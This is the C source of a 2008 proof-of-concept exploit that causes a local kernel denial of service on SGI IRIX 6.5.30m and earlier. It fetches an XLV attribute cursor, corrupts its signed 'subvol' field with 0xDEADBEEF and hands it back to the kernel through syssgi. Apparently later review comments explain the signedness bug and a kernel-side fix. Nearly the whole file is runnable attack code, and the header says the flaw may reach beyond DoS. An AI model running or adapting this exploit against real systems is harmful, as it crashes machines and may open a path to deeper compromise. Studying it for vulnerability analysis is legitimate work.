/* irix-xlvattrget-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * SGI IRIX <= 6.5.30m local kernel DoS POC
 * by mu-b - Thu 05 Jun 2008
 *
 * - Tested on: SGI IRIX 6.5.30m (MIPS)
 *
 * signedness for the win!@$! this is likely not just a DoS,
 * but I won't bother playing..
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <sys/syssgi.h>

/* Request type that main() stores in the first int of the SGI_XLV_ATTR_GET
 * request buffer.
 * NOTE(review): presumably mirrors a constant from the system XLV headers,
 * which this file does not include -- confirm against the target release. */
#define XLV_ATTR_STATS  13

/* Local declaration of the cursor that main() has the kernel fill in via
 * SGI_XLV_ATTR_CURSOR and then hands back to SGI_XLV_ATTR_GET.
 * NOTE(review): the layout is presumably copied from the system XLV header
 * and must match it exactly -- confirm.
 *
 * Every field is a plain signed int and all of them are writable by the
 * caller between the two syssgi() calls, so a kernel-side consumer cannot
 * treat any of them as trusted; each one needs a lower as well as an upper
 * bound check before it is used as an index. */
typedef struct xlv_attr_cursor {
  int generation;
  /* The following provides context information */
  int vol;                    /* volume table index */
  int subvol;                 /* minor device number */
  int plex;                   /* which plex in subvolume */
  int ve;                     /* which volume element in plex */
} xlv_attr_cursor_t;

/*
 * Proof-of-concept driver.  Asks the kernel for an XLV attribute cursor,
 * replaces the cursor's signed `subvol` field with 0xDEADBEEF and passes the
 * cursor back through SGI_XLV_ATTR_GET together with a request whose first
 * int is XLV_ATTR_STATS.
 *
 * Returns EXIT_FAILURE when either syssgi() call reports a negative result,
 * EXIT_SUCCESS otherwise.
 *
 * NOTE(review): the file header attributes the crash to signedness.  The
 * kernel handler is not part of this file; presumably it checks `subvol`
 * against an upper bound only, so a negative value passes -- confirm against
 * the kernel source.  The remedy lies on the kernel side: reject
 * out-of-range values, negative ones included, before the field is used.
 */
int
main (int argc, char **argv)
{
  xlv_attr_cursor_t cur;
  char req[1024];             /* stands in for xlv_attr_req_t */
  int rc;

  printf ("SGI IRIX <= 6.5.30m local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  /* Step 1: let the kernel populate a cursor. */
  rc = syssgi (SGI_XLV_ATTR_CURSOR, &cur);
  if (rc < 0)
    {
      fprintf (stderr, "%s: syssgi [SGI_XLV_ATTR_CURSOR] failed\n",
               argv[0]);
      return EXIT_FAILURE;
    }

  printf ("* cursor.gen: %d\n", cur.generation);

  /* Step 2: tamper with the cursor.  0xDEADBEEF does not fit in a 32-bit
   * signed int; on a two's-complement target the stored value is negative. */
  cur.subvol = 0xDEADBEEF;

  /* Only the leading int of the request is written; the remainder of `req`
   * is whatever happened to be on the stack.
   * NOTE(review): the cast assumes `req` is suitably aligned for int. */
  *(int *) req = XLV_ATTR_STATS;

  /* Step 3: hand the modified cursor back to the kernel. */
  printf ("* hitting\n");
  rc = syssgi (SGI_XLV_ATTR_GET, &cur, req);
  if (rc < 0)
    {
      fprintf (stderr, "%s: syssgi [SGI_XLV_ATTR_GET] failed\n",
               argv[0]);
      return EXIT_FAILURE;
    }

  return EXIT_SUCCESS;
}

